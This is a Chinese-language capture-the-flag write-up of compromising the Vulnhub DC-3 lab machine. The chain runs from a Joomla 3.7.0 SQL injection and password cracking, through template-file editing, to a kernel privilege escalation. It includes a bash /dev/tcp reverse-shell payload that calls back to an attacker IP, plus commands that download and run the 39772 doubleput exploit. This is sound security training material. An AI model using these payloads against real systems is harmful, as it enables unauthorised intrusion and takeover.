[Vulnhub] DC-3靶机渗透

0x00 环境搭建

靶机地址:http://www.vulnhub.com/entry/dc-32,312/
下载之后用vmware打开即可,使用桥接模式。
开机后搭建完成:
[Vulnhub] DC-3靶机渗透_第1张图片
该靶场只有一个flag。


0x01 主机端口探测

arp-scan -l 探测内网存活主机,再用nmap -sV -p- ip来探测端口:
[Vulnhub] DC-3靶机渗透_第2张图片
发现只开启了80端口(HTTP服务)


0x02 web渗透

访问80端口,发现是一个 Joomla 搭建的站:
[Vulnhub] DC-3靶机渗透_第3张图片
目录扫描,真正有用的目录不多:
[Vulnhub] DC-3靶机渗透_第4张图片
README.txt 中获得 Joomla 版本号:
[Vulnhub] DC-3靶机渗透_第5张图片
查找 Joomla3.7.0 已知漏洞,发现有sql注入和XSS:
[Vulnhub] DC-3靶机渗透_第6张图片
查看该漏洞信息:
[Vulnhub] DC-3靶机渗透_第7张图片
sqlmap拿到账户密码:
[Vulnhub] DC-3靶机渗透_第8张图片
用 john 破解密码:
[Vulnhub] DC-3靶机渗透_第9张图片
拿到账户名密码后登录管理后台:
[Vulnhub] DC-3靶机渗透_第10张图片
接下来就是想办法拿shell了


0x03 文件上传getshell

找到后台上传点:
[Vulnhub] DC-3靶机渗透_第11张图片
直接上传php马发现上传不了,选择直接修改已有文件:
构造payload:system("bash -c 'bash -i &> /dev/tcp/192.168.43.84/4444 0>&1'");写入文件
[Vulnhub] DC-3靶机渗透_第12张图片
本地开启监听,访问该文件http://192.168.43.102/templates/beez3/error.php获得反弹shell:
[Vulnhub] DC-3靶机渗透_第13张图片


0x04 内核提权

查看内核版本:
[Vulnhub] DC-3靶机渗透_第14张图片
查找Ubuntu 16.04漏洞:
[Vulnhub] DC-3靶机渗透_第15张图片
尝试后39772成功,找到并查看这个文件:
[Vulnhub] DC-3靶机渗透_第16张图片
将文件下载到靶机上,然后解压并允许:

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
unzip 39772.zip
tar -xvf exploit.tar
./doubleput

[Vulnhub] DC-3靶机渗透_第17张图片
[Vulnhub] DC-3靶机渗透_第18张图片
在根目录下找到flag:
[Vulnhub] DC-3靶机渗透_第19张图片


总结

整体流程如下:
主机发现 => 端口扫描 => 访问web服务 => 判断cms => 敏感信息泄露找到版本号 => 查找已知漏洞 => sql注入拿后台账户密码 => john破解密文 => 后台文件上传getshell => 内核漏洞提权 => 找到最终flag

与之前的靶场不一样的地方就是只有一个flag,少了中间的提示,充分体现到信息收集的重要性,要充分利用kali自带模块辅助渗透,复习了利用内核漏洞提权的流程。


参考链接:
https://www.cnblogs.com/chalan630/p/13363670.html(VulnHub::DC-3)

你可能感兴趣的:(靶场笔记,靶机,kali,linux,渗透测试,内核)